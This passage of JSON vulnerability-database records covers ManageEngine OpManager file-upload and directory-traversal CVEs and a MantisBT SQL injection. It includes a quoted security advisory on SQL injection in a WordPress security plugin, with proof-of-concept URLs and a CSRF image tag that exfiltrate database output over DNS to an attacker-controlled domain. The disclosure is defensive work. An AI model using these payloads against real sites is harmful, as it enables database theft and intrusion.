An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager AgentDataHandler FILENAME File Upload Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-142", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-142/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in ManageEngine OpManager FileCollector servlet regionID parameter\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2014-11-30T00:00:00", "type": "dsquare", "title": "ManageEngine OpManager FileCollector Servlet File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6034"], "modified": "2014-11-30T00:00:00", "id": "E-410", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", 
"cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in ManageEngine OpManager FileCollector servlet FILENAME parameter\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2014-11-30T00:00:00", "type": "dsquare", "title": "ManageEngine OpManager FileCollector Servlet File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2014-11-30T00:00:00", "id": "E-407", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:55:41", "description": "A directory traversal vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to lack of authentication and insufficient input validation on parameters sent to \"/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector\" in HTTP requests. 
A remote unauthenticated attacker can upload arbitrary files to arbitrary locations.", "cvss3": {}, "published": "2014-10-12T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine Multiple Products FileCollector doPost Directory Traversal (CVE-2014-6034)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6034"], "modified": "2015-11-03T00:00:00", "id": "CPAI-2014-1895", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T12:00:11", "description": "A directory traversal vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to lack of authentication and insufficient input validation on parameters sent to \"/servlets/multipartRequest\" in HTTP requests. 
A remote unauthenticated attacker can delete arbitrary files in arbitrary locations on the server and execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.", "cvss3": {}, "published": "2014-10-20T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine Multiple Products multipartRequest Directory Traversal (CVE-2014-6036)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6036"], "modified": "2014-10-21T00:00:00", "id": "CPAI-2014-1916", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-12-17T12:00:03", "description": "A directory traversal vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to lack of authentication and insufficient input validation in HTTP requests. 
A remote unauthenticated attacker can upload arbitrary files to arbitrary locations.", "cvss3": {}, "published": "2014-10-13T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine Multiple Products FileCollector Directory Traversal (CVE-2014-6035)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2014-10-28T00:00:00", "id": "CPAI-2014-1905", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T13:12:28", "description": "No description provided by source.", "published": "2014-09-29T00:00:00", "type": "seebug", "title": "Wordpress All In One WP Security Plugin 3.8.2 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6242"], "modified": "2014-09-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87286", "id": "SSV:87286", "sourceData": "\n Advisory ID: HTB23231\r\nProduct: All In One WP Security WordPress plugin\r\nVendor: Tips and Tricks HQ, Peter, Ruhul, Ivy\r\nVulnerable Version(s): 3.8.2 and probably prior\r\nTested Version: 3.8.2\r\nAdvisory Publication: September 3, 2014 [without technical details]\r\nVendor Notification: September 3, 2014\r\nVendor Patch: September 12, 2014\r\nPublic Disclosure: September 24, 2014\r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-6242\r\nRisk Level: Medium\r\nCVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ )\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nAdvisory Details:\r\n \r\nHigh-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however they can also be exploited by a non-authenticated attacker via a CSRF vector.\r\n \r\n \r\n1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242\r\n \r\n1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "orderby" HTTP GET parameter to the "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n \r\nThe PoC code below is based on the DNS Exfiltration technique and may be used to demonstrate the vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding the IP address for the `version()` (or any other sensitive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n \r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via a CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. 
In order to do so an attacker should trick a logged-in administrator to visit a web page with a CSRF exploit, e.g.:\r\n \r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n \r\n \r\n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameter to the "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n \r\nThe PoC code below is based on the DNS Exfiltration technique and may be used to demonstrate the vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding the IP address for the `version()` (or any other sensitive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n \r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via a CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. 
In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.:\r\n \r\n<img src="http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29">\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nSolution:\r\n \r\nUpdate to All In One WP Security 3.8.3\r\n \r\nMore Information:\r\nhttps://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nReferences:\r\n \r\n[1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin.\r\n[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n \r\n-----------------------------------------------------------------------------------------------\r\n 
\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87286", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T17:30:10", "description": "BUGTRAQ ID: 65445\r\nCVE ID: CVE-2014-1608\r\n\r\nMantisBT is a web-based bug tracking system.\r\n\r\nIn MantisBT versions before 1.2.16, the mci_file_get function in api/soap/mc_file_api.php has a SQL injection vulnerability, which allows remote attackers to execute arbitrary SQL commands via a crafted envelope tag in an mc_issue_attachment_get SOAP request.\n0\nmantisbt mantisbt < 1.2.16\nThe vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:\r\n\r\nhttp://www.mantisbt.org/", "cvss3": {}, "published": "2014-03-19T00:00:00", "title": "MantisBT 'mc_issue_attachment_get' SOAP API SQL Injection Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1608"], "modified": "2014-03-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61854", "id": "SSV:61854", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}